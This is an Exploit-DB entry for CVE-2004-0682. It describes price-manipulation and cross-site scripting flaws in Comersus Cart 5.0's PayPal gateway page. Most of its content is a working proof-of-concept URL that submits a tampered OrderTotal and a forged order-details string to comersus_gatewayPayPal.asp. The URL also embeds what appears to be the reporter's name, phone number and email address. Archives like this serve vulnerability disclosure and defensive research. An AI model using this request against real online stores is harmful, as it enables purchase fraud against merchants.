Comersus Open Technologies Comersus 5.0 comersus_gatewayPayPal.asp Price Manipulation

2004-07-07T00:00:00
ID EDB-ID:24260
Type exploitdb
Reporter Thomas Ryan
Modified 2004-07-07T00:00:00

Description

Comersus Open Technologies Comersus 5.0 comersus_gatewayPayPal.asp Price Manipulation. CVE-2004-0682. Webapps exploit for asp platform

                                        
                                            source: http://www.securityfocus.com/bid/10674/info

Comersus Cart is reported prone to multiple vulnerabilities. These issues may allow a remote attacker to carry out cross-site scripting attacks and manipulate parameters to change the price of an order.

Comersus Cart version 5.09 is affected by these issues, however, other versions may be prone to these vulnerabilities as well.

http://www.example.com/comersus/store/comersus_gatewayPayPal.asp?idOrder=2002&OrderTotal=|102|222|228|22|130|36|209&name=Thomas&lastName=Ryan&address=123+Easy+Modify+Street&city=New+York&state=NY&zip=10001&country=US&phone=212%2D857%2D1731&email=tommy%40providesecurity%2Ecom&orderDetails=1x+%23RDHT%2F11+Red+Hat+Deluxe+WorkStation+Options%3A+%3D+%2479%2E00%0D%0A2x+%23WME%2F1+Windows+Millennium+Edition+Options%3A+%3D+%24398%2E00%0D%0A1x+%23BPRES2%2F6+So+You+Want+to+Be+President%3F+Options%3A+%3D+%2414%2E39%0D%0A